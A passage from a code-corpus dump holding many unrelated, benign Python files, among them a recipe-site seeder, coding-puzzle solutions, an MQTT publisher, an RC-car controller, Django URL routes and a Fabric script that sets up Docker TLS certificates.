fromUserIds:\n fromUserIds.remove(toUserId)\n\n for fromUserId in fromUserIds:\n subscriptions.append(SubscriptionRelation(from_user=fromUserId + 1, to_user=toUserId + 1))\n subscription_id += 1\n\nSubscriptionRelation.bulk_create(subscriptions)\n\n# Step 7: Likes\nlikes = []\nrandom.seed(1993)\nfor fromUserId in range(len(users)):\n random.seed(1993 + fromUserId)\n numLikeRecipe = random.randint(0, len(recipes) - 1)\n random.seed(1993 + fromUserId + 10)\n likeRecipes = random.sample(range(len(recipes)), numLikeRecipe)\n\n for likeRecipe in likeRecipes:\n likes.append(LikeRelation(user=fromUserId + 1, recipe=likeRecipe + 1))\n\nLikeRelation.bulk_create(likes)\n\n# Step 8: Comments\nwith Path('data/comments.txt').open('r') as f:\n comment_texts = f.readlines()\n comment_texts = [c.strip() for c in comment_texts if c.strip()]\n\ncomment_now_texts = comment_texts\ncomments = []\nfor fromUserId in range(len(users)):\n for recipeId in range(len(recipes)):\n random.seed(1993 + fromUserId + recipeId)\n haveComment = random.randint(0, 10)\n if haveComment > 8:\n random.seed(2993 + fromUserId)\n numCommentTexts = random.randint(1, 3)\n random.seed(5993 + fromUserId)\n if numCommentTexts > len(comment_now_texts):\n comment_now_texts = comment_texts\n\n comment_selected_idxs = random.sample(range(len(comment_now_texts)), numCommentTexts)\n for c in comment_selected_idxs:\n comments.append(Comment(user=fromUserId + 1, recipe=recipeId + 1, text=comment_texts[c]))\n comment_now_texts.remove(comment_texts[c])\n\nComment.bulk_create(comments)\n","sub_path":"back-end/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"526687248","text":"'''\n\n\nSherlock Holmes suspects his archenemy Professor Moriarty is once again plotting something diabolical. Sherlock's companion, Dr. Watson, suggests Moriarty may be responsible for MI6's recent issues with their supercomputer, The Beast.\n\nShortly after resolving to investigate, Sherlock receives a note from Moriarty boasting about infecting The Beast with a virus. He also gives him a clue: an integer. Sherlock determines the key to removing the virus is to find the largest Decent Number having that number of digits.\n\nA Decent Number has the following properties:\n\nIts digits can only be 3's and/or 5's.\nThe number of 3's it contains is divisible by 5.\nThe number of 5's it contains is divisible by 3.\nIt is the largest such number for its length.\nMoriarty's virus shows a clock counting down to The Beast's destruction, and time is running out fast. Your task is to help Sherlock find the key before The Beast is destroyed!\n\nFor example, the numbers and are both decent numbers because there are 's and 's in the first, and 's in the second. They are the largest values for those length numbers that have proper divisibility of digit occurrences.\n\nFunction Description\n\nComplete the decentNumber function in the editor below.\n\ndecentNumber has the following parameter(s):\n\nint n: the length of the decent number to create\nPrints\n\nPrint the decent number for the given length, or if a decent number of that length cannot be formed. No return value is expected.\n\nInput Format\n\nThe first line is an integer, , the number of test cases.\n\nThe next lines each contain an integer , the number of digits in the number to create.\n\nConstraints\n\n\n\nSample Input\n\nSTDIN Function\n----- --------\n4 t = 4\n1 n = 1 (first test case)\n3 n = 3 (second test case)\n5\n11\nSample Output\n\n-1\n555\n33333\n55555533333\n\n'''\n\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the decentNumber function below.\ndef decentNumber(n):\n if n % 3 == 0:\n print('5' * n) \n elif n % 3 == 1 and n >= 10:\n print( '5'* (n - 10) + '3' * (10))\n elif n % 3 == 2 and n >= 5: \n print('5' *(n - 5) + '3' * (5))\n else:\n print(-1) \n return \nif __name__ == '__main__':\n t = int(input().strip())\n\n for t_itr in range(t):\n n = int(input().strip())\n\n decentNumber(n)\n","sub_path":"Day 96/SherlockAndTheBeast.py","file_name":"SherlockAndTheBeast.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"66739727","text":"# 11 Feb 2005\tFix update of summary table\n\nimport mx.DateTime\nimport iemdb\nIEM = iemdb.connect('iem')\nicursor = IEM.cursor()\n\ntoday = mx.DateTime.now()\nsql = \"\"\"update summary_%s s SET max_gust = 0 \n FROM stations t WHERE t.iemid = s.iemid and day = 'TODAY' and max_gust_ts < '%s 00:05' and\n t.network in ('KCCI','KIMT','KELO')\"\"\" % (\n today.year, today.strftime(\"%Y-%m-%d\"),)\nicursor.execute(sql)\nicursor.close()\nIEM.close()\n","sub_path":"scripts/qc/correctGusts.py","file_name":"correctGusts.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"34499069","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nimport uuid\n\nfrom unittest import TestCase\n\nfrom hestia.tz_utils import local_now\nfrom marshmallow import ValidationError\nfrom tests.utils import assert_equal_dict\n\nfrom polyaxon_schemas.api.experiment import ExperimentConfig\nfrom polyaxon_schemas.api.group import GroupConfig\nfrom polyaxon_schemas.api.project import ProjectConfig\n\n\nclass TestProjectConfigs(TestCase):\n def test_validate_project_name_config(self):\n config_dict = {'name': 'test sdf', 'description': '', 'is_public': True}\n with self.assertRaises(ValidationError):\n ProjectConfig.from_dict(config_dict)\n\n def test_project_config(self):\n config_dict = {\n 'name': 'test',\n 'description': '',\n 'is_public': True,\n 'has_code': True,\n 'has_tensorboard': True,\n 'tags': ['foo'],\n 'num_experiments': 0,\n 'num_independent_experiments': 0,\n 'num_experiment_groups': 0,\n 'num_jobs': 0,\n 'num_builds': 0,\n 'created_at': local_now().isoformat(),\n 'updated_at': local_now().isoformat()\n }\n config = ProjectConfig.from_dict(config_dict)\n config_to_dict = config.to_dict()\n config_to_dict.pop('id', None)\n config_to_dict.pop('experiment_groups', None)\n config_to_dict.pop('experiments', None)\n config_to_dict.pop('has_notebook', None)\n config_to_dict.pop('unique_name', None)\n config_to_dict.pop('user', None)\n config_to_dict.pop('owner', None)\n config_to_dict.pop('uuid', None)\n assert config_to_dict == config_dict\n config_dict.pop('description')\n config_dict.pop('updated_at')\n config_dict.pop('has_code')\n config_to_dict = config.to_light_dict()\n config_to_dict.pop('has_notebook', None)\n config_to_dict.pop('unique_name', None)\n assert config_to_dict == config_dict\n\n config_to_dict = config.to_dict(humanize_values=True)\n assert config_to_dict.pop('created_at') == 'a few seconds ago'\n assert config_to_dict.pop('updated_at') == 'a few seconds ago'\n\n config_to_dict = config.to_light_dict(humanize_values=True)\n assert config_to_dict.pop('created_at') == 'a few seconds ago'\n\n def test_project_experiments_and_groups_config(self):\n uuid_value = uuid.uuid4().hex\n config_dict = {'name': 'test',\n 'description': '',\n 'is_public': True,\n 'experiment_groups': [\n GroupConfig(content='content',\n uuid=uuid_value,\n project=uuid_value).to_dict()],\n 'experiments': [\n ExperimentConfig(uuid=uuid_value,\n project=uuid_value).to_dict()]}\n config = ProjectConfig.from_dict(config_dict)\n assert_equal_dict(config_dict, config.to_dict())\n\n config_dict.pop('description')\n config_dict.pop('experiment_groups')\n config_dict.pop('experiments')\n assert_equal_dict(config_dict, config.to_light_dict())\n","sub_path":"tests/test_api/test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"87866020","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\nfrom setuptools.command.install import install as _install\n\nclass install(_install):\n def pre_install_script(self):\n pass\n\n def post_install_script(self):\n pass\n\n def run(self):\n self.pre_install_script()\n\n _install.run(self)\n\n self.post_install_script()\n\nif __name__ == '__main__':\n setup(\n name = 'aws-monocyte',\n version = '0.3.509-312',\n description = '''Monocyte - Search and Destroy unwanted AWS Resources relentlessly.''',\n long_description = '''\n Monocyte is a bot for destroying AWS resources in non-EU regions written in Python using Boto.\n It is especially useful for companies that are bound to European privacy laws\n and for that reason don't want to process user data in non-EU regions.\n ''',\n author = \"Jan Brennenstuhl, Arne Hilmann\",\n author_email = \"jan@brennenstuhl.me, arne.hilmann@gmail.com\",\n license = 'Apache License 2.0',\n url = 'https://github.com/ImmobilienScout24/aws-monocyte',\n scripts = ['scripts/monocyte'],\n packages = [\n 'monocyte',\n 'monocyte.plugins',\n 'monocyte.handler'\n ],\n py_modules = [],\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Programming Language :: Python',\n 'Topic :: System :: Networking',\n 'Topic :: System :: Software Distribution',\n 'Topic :: System :: Systems Administration'\n ],\n entry_points = {},\n data_files = [],\n package_data = {},\n install_requires = [\n 'boto',\n 'boto3',\n 'docopt',\n 'mock',\n 'pils',\n 'python-cloudwatchlogs-logging',\n 'yamlreader'\n ],\n dependency_links = [],\n zip_safe=True,\n cmdclass={'install': install},\n )\n","sub_path":"pypi_install_script/aws-monocyte-0.3.509.post312.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"302648572","text":"import paho.mqtt.client as mqtt\nimport json\n\nimport sys\n\ndef on_connect(client, userdata, flags, rc):\n # 연결이 성공적으로 된다면 완료 메세지 출력\n if rc == 0:\n print(\"completely connected\")\n else:\n print(\"Bad connection Returned code=\", rc)\n\n# 연결이 끊기면 출력\ndef on_disconnect(client, userdata, flags, rc=0):\n print(str(rc))\n\n\ndef on_publish(client, userdata, mid):\n print(\"In on_pub callback mid= \", mid)\n\n# 새로운 클라이언트 생성\nclient = mqtt.Client()\n\n# 콜백 함수 설정 on_connect(브로커에 접속), on_disconnect(브로커에 접속중료), on_publish(메세지 발행)\nclient.on_connect = on_connect\nclient.on_disconnect = on_disconnect\nclient.on_publish = on_publish\n\n# address : localhost\n# port: 1883 에 연결\nclient.connect('localhost', 1883)\nclient.loop_start()\n\n# topic 으로 메세지 발행\nprint(str(sys.argv))\ncommand = sys.argv[1]\nclient.publish('test', command, 1)\nclient.loop_stop()\n\n# 연결 종료\nclient.disconnect()","sub_path":"face_recog_mqtt_pub.py","file_name":"face_recog_mqtt_pub.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"239910867","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n My third task for Assignment 11 where a user inputs a text file from which words representing each letter of the alphabet are compiled into their own dictionary. Each dictionary output is printed into a new, tab-delineated text file...giving a total of 26 files (one per letter in alphabet).\n\n Created by A.J. Turner on March 1, 2016. Helpful instructions/hints provided by S. Shakya.\n Copyright 2016 A.J. Turner. All rights reserved.\n\n\"\"\"\n\nimport argparse\nimport re\nimport os.path\nimport string\n\n\ndef user_files():\n\t\"\"\" adding user input that includes the name of the file to read and the name of the output file they write\"\"\"\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--file_in\", help=\"Type into command line: --file_in \", type=str)\n\targs = parser.parse_args()\n\treturn args\n\n\ndef all_letters(file,letter):\n\t\"\"\" separating words in input file by alphabetic letter and keeping associated counts\"\"\"\n\t#alphabetically grouped word\\tcount lists\n\tget_letter = re.findall(r'\\b['+letter+']\\w+\\t\\d+', file)\n\tlets = {} #dictionary placeholder for below\n\tfor word_num in get_letter: #iterate over each word in alphabetic list grouping\n\t\tsplit_word = word_num.split('\\t')\n\t\tlets[split_word[0]] = split_word[1]#creating dictionary with word/count\\\n\t\t#for each alphabetic group\n\treturn lets\n\n\ndef main():\n\targs = user_files()\n\twith open(args.file_in, 'r') as file_in:\n\t\tf = file_in.read()\n\t\tfile_in.close()\n\t\talphabet = list(string.ascii_lowercase) #getting all letts of alphabet as list\n\t\tfor letter in alphabet: #iterating over the alphabet, one letter at a time\n\t\t\tlets = all_letters(f, letter) #calling dictionaries from function two\n\t\t\tout_file = os.path.join(os.getcwd(), letter.upper()+'-words-'+args.file_in)\n\t\t\twith open(out_file, 'w') as out_file:\n\t\t\t#putting dictionary for each word grouping into a file\n\t\t\t\tfor key,value in lets.items():\n\t\t\t\t\tout_file.write(\"{}\\t{}\\n\".format(key, value))\n\t\t\t\tout_file.close()\t\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"answers/turneraj/a11task3.py","file_name":"a11task3.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"90051584","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\UnityPy\\classes\\MonoBehaviour.py\n# Compiled at: 2020-03-30 16:40:06\n# Size of source mod 2**32: 288 bytes\nfrom .Behaviour import Behaviour\nfrom .PPtr import PPtr\n\nclass MonoBehaviour(Behaviour):\n\n def __init__(self, reader):\n super().__init__(reader=reader)\n self.script = PPtr(reader)\n self.name = reader.read_aligned_string()\n self.read_type_tree()","sub_path":"pycfiles/UnityPy-1.3.0-py3.6/MonoBehaviour.cpython-36.py","file_name":"MonoBehaviour.cpython-36.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"408378322","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/lazy_slides/download.py\n# Compiled at: 2012-03-17 18:14:01\nimport contextlib, logging, os, urllib2, urlparse, uuid\nlog = logging.getLogger(__name__)\n\ndef download(url, directory):\n \"\"\"Download a file specified by a URL to a local file.\n\n This generates a unique name for the downloaded file and saves\n into that.\n\n :param url: The URL to download.\n :param directory: The directory into which to save the file.\n \"\"\"\n parsed = urlparse.urlparse(url)\n filename = os.path.split(parsed.path)[1]\n filename_comps = os.path.splitext(filename)\n filename = ('{}_{}{}').format(filename_comps[0], uuid.uuid4(), filename_comps[1])\n filename = os.path.join(directory, filename)\n log.info(('Downloading {} to {}').format(url, filename))\n with contextlib.closing(urllib2.urlopen(url)) as (infile):\n with open(filename, 'wb') as (outfile):\n outfile.write(infile.read())\n return filename","sub_path":"pycfiles/lazy_slides-0.3-py2.7/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"471871105","text":"import serial\nimport cv2\nimport math\nimport wiringpi\nimport RPi.GPIO as GPIO\nimport socket\nimport time\nimport pdb\n\nGPIO.setwarnings(False)\n\n# referring to the pins by GPIO numbers\nGPIO.setmode(GPIO.BCM)\n\n# define pi GPIO\nGPIO_TRIGGER = 23\nGPIO_ECHO = 24\n\n# output pin: Trigger\nGPIO.setup(GPIO_TRIGGER,GPIO.OUT)\n# input pin: Echo\nGPIO.setup(GPIO_ECHO,GPIO.IN)\n# initialize trigger pin to low\nGPIO.output(GPIO_TRIGGER, False)\n\ntime.sleep(2)\n\nclass RCControl(object):\n\n\tdef __init__(self):\n\n\t\tself.server_socket = socket.socket()\n\t\tself.server_socket.bind(('192.168.0.114', 1234)) #pi\n\t\tself.server_socket.listen(0)\n\t\tself.connection= self.server_socket.accept()[0]\n\n\t\twiringpi.wiringPiSetup()\n\t\twiringpi.pinMode(21, 1) \n\t\twiringpi.pinMode(22, 1)\n\t\twiringpi.pinMode(23, 1)\n\t\twiringpi.pinMode(24, 1)\n\t\t\n\t\tGPIO.setwarnings(False)\n\t\tGPIO.setmode(GPIO.BCM)\n\t\tGPIO.setup(8, GPIO.OUT, initial= GPIO.LOW) #left\n\t\tGPIO.setup(4, GPIO.OUT, initial= GPIO.LOW) #red\n\t\tGPIO.setup(7, GPIO.OUT, initial= GPIO.LOW) #right\n\n\tdef steer(self):\n\t\ttry:\n\t\t\twhile(True):\n\t\t\t\tsep = ' '\n\t\t\t\tbuf = b''\n\t\t\t\twhile sep not in buf:\n\t\t\t\t\tbuf+=self.connection.recv(1024)\n\t\t\t\t\n\t\t\t\tprediction = str(buf)\n\t\t\t\tdistance = self.measure()\n\t\t\t\tprint(distance)\n\t\t\t\t\n\t\t\t\tif distance > 30.0 :\n\t\t\t\t\tif prediction == \"2 \":\n\t\t\t\t\t\tprint(\"Forward\")\n\t\t\t\t\t\twiringpi.digitalWrite(21, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(22, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(23, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(24, 1)\n\t\t\t\t\t\t\n\t\t\t\t\t\tGPIO.output(8, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(7, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(4, GPIO.LOW)\n\n\t\t\t\t\telif prediction == \"0 \":\n\t\t\t\t\t\tprint(\"Left\")\n\t\t\t\t\t\twiringpi.digitalWrite(21, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(22, 1)\n\t\t\t\t\t\twiringpi.digitalWrite(23, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(24, 0)\n\t\t\t\t\t\t\t\t\t\t\t\t \n\t\t\t\t\t\tGPIO.output(8, GPIO.HIGH) # Turn on\n\t\t\t\t\t\tGPIO.output(7, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(4, GPIO.LOW)\n\n\t\t\t\t\telif prediction == \"1 \":\n\t\t\t\t\t\tprint(\"Right\")\n\t\t\t\t\t\twiringpi.digitalWrite(21, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(22, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(23, 1)\n\t\t\t\t\t\twiringpi.digitalWrite(24, 1)\n\t\t\t\t\t\t\n\t\t\t\t\t\tGPIO.output(8, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(7, GPIO.HIGH) # Turn on\n\t\t\t\t\t\tGPIO.output(4, GPIO.LOW)\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.stop()\n\t\t\t\t\t\tprint(\"Stop\")\n\t\t\t\t\t\twiringpi.digitalWrite(21, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(22, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(23, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(24, 0)\n\n\t\t\t\t\t\tGPIO.output(8, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(7, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(4, GPIO.HIGH)\n\n\t\t\t\telse:\n\t\t\t\t\tself.stop()\n\t\t\t\t\tprint(\"Obstacle ahead!\")\n\t\t\t\t\t\n\t\tfinally:\n\t\t\t#self.connection.close()\n\t\t\tself.server_socket.close()\n\t\t\tGPIO.cleanup()\n\n\tdef stop(self):\n\t\twiringpi.digitalWrite(21, 0)\n\t\twiringpi.digitalWrite(22, 0)\n\t\twiringpi.digitalWrite(23, 0)\n\t\twiringpi.digitalWrite(24, 0)\n\n\t\tGPIO.output(8, GPIO.LOW) # Turn on\n\t\tGPIO.output(7, GPIO.LOW) # Turn on\n\t\tGPIO.output(4, GPIO.HIGH)\n\n\tdef measure(self):\n\t\t\"\"\"\n\t\tmeasure distance\n\t\t\"\"\"\n\t\tGPIO.output(GPIO_TRIGGER, True)\n\t\ttime.sleep(0.00001)\n\t\tGPIO.output(GPIO_TRIGGER, False)\n\t\tstart = time.time()\n\n\t\twhile GPIO.input(GPIO_ECHO)==0:\n\t\t\tstart = time.time()\n\n\t\twhile GPIO.input(GPIO_ECHO)==1:\n\t\t\tstop = time.time()\n\n\t\telapsed = stop-start\n\t\tdistance = (elapsed * 34300)/2\n\t\tdistance = round(distance, 1)\n\t\treturn distance\n\n\nif __name__ == '__main__':\n\trc=RCControl()\n\trc.steer()\n","sub_path":"neural networks/test/pitest.py","file_name":"pitest.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"350869527","text":"import math\n\nn = int(input().strip())\n\ndef isPalindromic(num):\n num_str = str(num)\n if num_str == num_str[::-1]:\n return True\n return False\n\ndef doesFactorize(num):\n start_factor = math.floor(math.sqrt(num))\n for i in range(start_factor,99,-1):\n if num % i == 0:\n other_factor = num // i\n if 100 < i < 1000 and 100 < other_factor < 1000:\n return True\n return False\n\nfor i in range(n):\n N = int(input().strip())\n for num in range(N,101100,-1):\n if isPalindromic(num) and doesFactorize(num):\n print(num)\n break\n\n\n\n\n\n\n\n\n","sub_path":"Project Euler/ProjectEuler_4.py","file_name":"ProjectEuler_4.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"19120960","text":"from src.data_struc.deque.deque import Deque\n\n\n# Example realization palindrome checker\ndef palindrome(a_string):\n\n d = Deque() # Create deque\n\n for char in a_string:\n d.add_rear(char) # Add string char by char to deque\n\n equal = True\n\n while equal and d.size() > 1:\n first = d.remove_front() # Pop element from front\n last = d.remove_rear() # Pop element from rear\n if first != last: # Compare elements\n equal = False\n\n return equal\n\n\nprint(palindrome('madam'))","sub_path":"src/data_struc/deque/palindrome_checker.py","file_name":"palindrome_checker.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"255826060","text":"from django.urls import path\nfrom bowling.views import (\n RowListView,\n RowDetailView,\n RowSessionDetailView,\n RowSessionCreateView,\n RowSessionUpdateView,\n PlayerCreateView,\n PlayerUpdateView,\n make_throws\n)\nurlpatterns = [\n path(\"row/\", RowListView.as_view(), name=\"row-list\" ),\n path(\n \"row/\",\n RowDetailView.as_view(),\n name=\"row-detail\"\n ),\n path(\n \"row_session/create\",\n RowSessionCreateView.as_view(),\n name=\"row_session-create\"\n ),\n path(\n \"row_session//update\",\n RowSessionUpdateView.as_view(),\n name=\"row_session-update\"\n ),\n path(\"row_session/\",\n RowSessionDetailView.as_view(),\n name=\"row_session-detail\"\n ),\n path(\"row_session//throws\",\n make_throws,\n name=\"row_session-throws\"\n ),\n path(\"player/create\",\n PlayerCreateView.as_view(),\n name=\"player-create\"\n ),\n path(\"player//update\",\n PlayerUpdateView.as_view(),\n name=\"player-update\"\n ),\n # path(\"car/\", CarDetailView.as_view(), name=\"car-detail\" ),\n]\n","sub_path":"bowling/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"606663242","text":"#assignment 3: STOPWATCH\n\n#http://www.codeskulptor.org/#user40_pzrY0uGl4PsTfgp_24.py\n\n# template for \"Stopwatch: The Game\"\nimport simplegui\n# define global variables\ntime = 0\nclick_counter = 0\npoint_counter = 0\n\n# define helper function format that converts time\n# in tenths of seconds into formatted string A:BC.D\ndef format(t):\n A = t / 600\n B = ((t / 10) % 60) // 10\n C = ((t / 10) % 60) % 10\n D = (t % 60) % 10\n \n return str(A) + \":\" + str(B) + str(C) + \".\" + str(D)\n \n \n# define event handlers for buttons; \"Start\", \"Stop\", \"Reset\"\ndef start():\n timer.start()\ndef stop():\n global click_counter\n global point_counter\n if timer.is_running() == True:\n timer.stop()\n click_counter += 1\n if time % 10 == 0:\n point_counter += 1\n else:\n timer.stop()\n \ndef play():\n global click_counter\n global point_counter\n if timer.is_running() == True:\n timer.stop()\n click_counter += 1\n if time % 10 == 0:\n point_counter += 1\n elif timer.is_running() == False:\n timer.start()\n \n \n \n \n \ndef reset(): \n global time\n global click_counter\n global point_counter\n timer.stop()\n time = 0\n click_counter = 0\n point_counter = 0\n \n\n \n# define event handler for timer with 0.1 sec interval\ndef timer_handler():\n global time\n time += 1 \n \n \n \n \n# define draw handler\ndef draw(canvas):\n global time\n canvas.draw_text(str(format(time)), [100, 200], 80, \"White\")\n canvas.draw_text(str(point_counter) + \"/\" + str(click_counter),\\\n [300, 50], 25, \"White\") \n \n# create frame\nframe = simplegui.create_frame(\"Stopwatch_the_Game\", 400, 400)\ntimer = simplegui.create_timer(100, timer_handler)\n\n\n# register event handlers\nframe.add_button('Play', play, 200)\n\nframe.add_button('Start', start, 200)\nframe.add_button('Stop', stop, 200)\nframe.add_button('Reset', reset, 200)\nframe.set_draw_handler(draw)\nframe.set_canvas_background('Black')\n\n# start frame\nframe.start()\n\n\n\n\n\n\n","sub_path":"Stopwatch.py","file_name":"Stopwatch.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"605609618","text":"'''\nDocker host and client utilities\n'''\nfrom datetime import datetime\n\nfrom fabric.api import *\nfrom fabric.contrib import *\n\n# needed for adding users\n# from confighelper import ConfigHelper\n\n@task\ndef create_and_install_certs(do_client_certs=False, do_server_certs=False, hostname=''):\n '''\n This create and install client and server (host) keys for TLS auth and crypto for docker client.\n\n Default for the two install operations is false, add :true,true to do it for real.\n\n Example:\n fab docker.create_and_install_certs --hosts=atomic-v1-aws.tinisi.local -u centos\n '''\n if ( not hostname ):\n hostname = env.host_string\n\n working_dir = _create_working_dir()\n\n # always create these, should be safe\n create_host_certs(working_dir=working_dir, hostname=hostname)\n create_client_certs(working_dir=working_dir, hostname=hostname)\n\n if do_client_certs:\n install_client_certs(working_dir=working_dir, hostname=hostname)\n\n if do_server_certs:\n install_server_certs(working_dir=working_dir, hostname=hostname)\n\n@task\ndef create_host_certs(working_dir='', hostname=''):\n '''\n This will set up a CA and server (docker host) keys.\n '''\n\n if ( not hostname ):\n hostname = env.host_string\n\n # this is from:\n # https://docs.docker.com/engine/security/https/\n\n if ( not working_dir ):\n working_dir = _create_working_dir()\n\n with cd(working_dir):\n # this creates the private key for our CA\n run('openssl genrsa -aes256 -out ca-key.pem 4096')\n # Enter pass phrase for ca-key.pem:\n # Verifying - Enter pass phrase for ca-key.pem:\n\n # this creates the public key for our CA\n # TODO: deal with prompt\n run('openssl req -new -x509 -days 365 -key ca-key.pem -sha256 -out ca.pem')\n\n # this creates a server key and CSR\n # TODO: deal with prompt\n run('openssl genrsa -out server-key.pem 4096')\n\n # this makes a CSR\n run('openssl req -subj \"/CN={hostname}\" -sha256 -new -key server-key.pem -out server.csr'.format(hostname=hostname))\n\n # create a conf file with allowed IP's\n # add a second such as IP:10.10.10.20,IP:127.0.0.1 to specify more than one IP\n # not actually sure this is needed\n run('echo subjectAltName = IP:10.10.10.20,IP:127.0.0.1 > extfile.cnf')\n\n # it signs the key\n run('openssl x509 -req -days 365 -sha256 -in server.csr -CA ca.pem -CAkey ca-key.pem \\\n-CAcreateserial -out server-cert.pem -extfile extfile.cnf')\n\n # this is the config to make the demon use tlsverify\n # docker daemon --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem -H=0.0.0.0:2376\n\n@task\ndef create_client_certs(working_dir='', hostname=''):\n '''\n This creates certs to be used for a client.\n '''\n\n if ( not hostname ):\n hostname = env.host_string\n\n if ( not working_dir ):\n working_dir = _create_working_dir()\n\n with cd(working_dir):\n\n run('openssl genrsa -out key.pem 4096')\n\n run('openssl req -subj \\'/CN=client\\' -new -key key.pem -out client.csr')\n\n run('echo extendedKeyUsage = clientAuth > client_extfile.cnf')\n\n run('openssl x509 -req -days 365 -sha256 -in client.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out cert.pem -extfile client_extfile.cnf')\n\n run('rm -v client.csr server.csr')\n\n run('chmod -v 0400 ca-key.pem key.pem server-key.pem')\n\n run('chmod -v 0444 ca.pem server-cert.pem cert.pem')\n\n@task\ndef install_server_certs(working_dir='', hostname=''):\n\n if ( not hostname ):\n hostname = env.host_string\n\n install_dir = '/etc/docker/certs.d'\n host_cert_dir = '{install_dir}/{hostname}'.format(install_dir=install_dir,hostname=hostname)\n \n with settings(warn_only=True):\n sudo('mkdir {install_dir}'.format(install_dir=install_dir))\n\n sudo('mkdir %(host_cert_dir)s' % {\"host_cert_dir\": host_cert_dir})\n\n with cd(working_dir):\n sudo('cp ca-key.pem server-key.pem server-cert.pem %(host_cert_dir)s' % {\"host_cert_dir\": host_cert_dir})\n\n with settings(warn_only=True):\n sudo('sudo service docker stop')\n sudo('sudo service docker start')\n\n@task\ndef install_client_certs(working_dir, hostname=''):\n\n if ( not hostname ):\n hostname = env.host_string\n\n install_dir = '~/.docker'\n\n with settings(warn_only=True):\n _create_client_hostname_dir(install_dir, hostname)\n\n tmp_dir = './tmp'\n\n with cd(working_dir):\n get('ca.pem', tmp_dir)\n get('cert.pem', tmp_dir)\n get('key.pem', tmp_dir)\n\n with lcd(tmp_dir):\n local('cp ca.pem {install_dir}/{hostname}/'.format(install_dir=install_dir, hostname=hostname))\n local('cp cert.pem {install_dir}/{hostname}/'.format(install_dir=install_dir, hostname=hostname))\n local('cp key.pem {install_dir}/{hostname}/'.format(install_dir=install_dir, hostname=hostname))\n\n@task\ndef pre_install_docker(os='ubuntu', hostname=''):\n\n if ( not hostname ):\n hostname = env.host_string\n\n if ( os == 'ubuntu' ):\n _pre_install_docker_ubuntu(hostname=hostname)\n\n@task\ndef install_docker(os='ubuntu', hostname=''):\n\n if ( not hostname ):\n hostname = env.host_string\n\n if ( os == 'ubuntu' ):\n _install_docker_ubuntu(hostname=hostname)\n\n# private helpers\n\ndef _pre_install_docker_ubuntu(hostname=''):\n docker_source_list_path = '/etc/apt/sources.list.d/docker.list'\n\n sudo('apt-get update')\n sudo('apt-get --assume-yes install apt-transport-https ca-certificates')\n sudo('apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 